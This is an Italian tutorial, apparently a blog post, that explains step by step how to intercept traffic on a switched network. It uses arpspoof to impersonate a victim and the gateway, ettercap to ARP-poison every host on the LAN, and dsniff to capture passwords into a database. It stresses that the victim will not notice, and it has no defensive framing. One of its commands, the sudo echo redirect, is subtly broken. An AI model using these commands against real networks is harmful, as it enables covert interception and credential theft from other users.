Dsniff è una delle suite di strumenti per lo sniffing dei pacchetti più complete e potenti disponibili gratuitamente per l'acquisizione e l'elaborazione delle informazioni di autenticazione. Le sue funzionalità e numerose utilità lo hanno reso uno strumento comune utilizzato dagli aggressori per annusare password e informazioni di autenticazione dalle reti.
Uno switch di rete non inoltra i pacchetti a tutti nella rete allo stesso modo di un hub di rete, quindi in teoria una persona nella rete non può guardare il traffico di un'altra persona. Esistono tuttavia modi per superare questo problema, ovvero eseguendo l'arp spoofing.
Annusa
Questo post discuterà solo di come è fatto senza discutere la teoria alla base del processo. Per iniziare è installare il programma necessario, che in questo caso è il pacchetto dsniff che contiene il programma arpspoof di cui abbiamo bisogno. In Ubuntu o in qualsiasi altra distribuzione basata su Debian, è installabile con il comando apt-get come segue;
Installazione (Ubuntu)
$ sudo apt-get install dsniff
Abilita l'inoltro IP
Per assicurarsi che il traffico venga inoltrato alla destinazione reale quando raggiunge la nostra macchina, è necessario eseguire il seguente comando;
$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
Ciò assicurerà che la connessione della macchina di destinazione non venga disconnessa e nessuno dovrebbe rendersi conto di cosa stiamo facendo.
Esegui lo spoofing ARP
Il comando seguente dirà al gateway "Io sono 192.168.0.100" e il comando successivo dice a 192.168.0.100 "Io sono il gateway"
$ sudo arpspoof 192.168.0.100 -t 192.168.0.1 $ sudo arpspoof 192.168.0.1 -t 192.168.0.100
Con questo, tutto il traffico che dovrebbe andare al gateway dalla macchina, e viceversa, passerà prima attraverso la nostra macchina e solo dopo verrà inoltrato al vero obiettivo. Con questo possiamo eseguire qualsiasi strumento di analisi dei pacchetti come tcpdump o wireshark.
Ettercap
Esistono tuttavia programmi per semplificare l'intero processo. Uno dei programmi preferiti per questo è ettercap. Ettercap può anche eseguire l'arp spoofing, tra le molte altre funzionalità che ha. In Ubuntu, il pacchetto si chiama ettercap-gtk;
Installazione (Ubuntu)
$ sudo apt-get install ettercap-gtk
Esegui ARP spoofing (GUI)
L'esecuzione del programma con l'opzione -G lo eseguirà in GTK anziché in ncurses.
$ sudo ettercap -G
Nel menu, scegli quanto segue;
Sniff -> Unfied sniffing
E al prompt, scegli l'interfaccia di rete da utilizzare. Normalmente sarebbe eth0
Network Interface: eth0
Nel menu di nuovo, scegli quanto segue per aggiungere tutti gli host della rete all'elenco
Hosts -> Scan for hosts
E seguendo quanto segue eseguirà l'arp spoofing per tutti nella rete
Mitm -> Arp poisoning -> Ok Start -> Start sniffing
Esegui spoofing ARP (comando)
Il comando seguente farà la stessa cosa dell'esempio precedente, in un unico comando;
$ sudo ettercap -q -T -M arp // //
Esempi di comando dsniff
1. Per monitorare la rete per protocolli non sicuri:
# dsniff -m [-i interface] [-s snap-length] [filter-expression]
2. Per salvare i risultati in un database, invece di stamparli:
# dsniff -w gotcha.db [other options...]
3. Per leggere e stampare i risultati dal database:
# dsniff -r gotcha.db